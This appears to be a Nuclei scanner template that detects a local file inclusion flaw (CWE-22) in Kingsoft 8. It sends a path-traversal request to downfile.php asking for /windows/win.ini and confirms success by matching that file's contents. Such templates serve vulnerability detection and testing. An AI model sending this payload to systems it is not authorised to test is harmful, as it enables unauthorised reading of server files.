id: kingsoft-v8-file-read

info:
  name: Kingsoft 8 - Local File Inclusion
  author: xc
  severity: high
  description: Kingsoft 8 is vulnerable to local file inclusion.
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: kingsoft,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/htmltopdf/downfile.php?filename=/windows/win.ini"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "for 16-bit app support"
          - "[extensions]"
        condition: and

      - type: word
        part: header
        words:
          - "application/zip"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100bcda9e9a018ceff7aedeeb8237c4fdcbc4993aa87e6889e94704aa1e512bdacd02200f4b55ba05a07f7c426e2c44feda89e67d0cfe1fc9fa97e0c634313e523bf040:922c64590222798bb761d5b6d8e72950
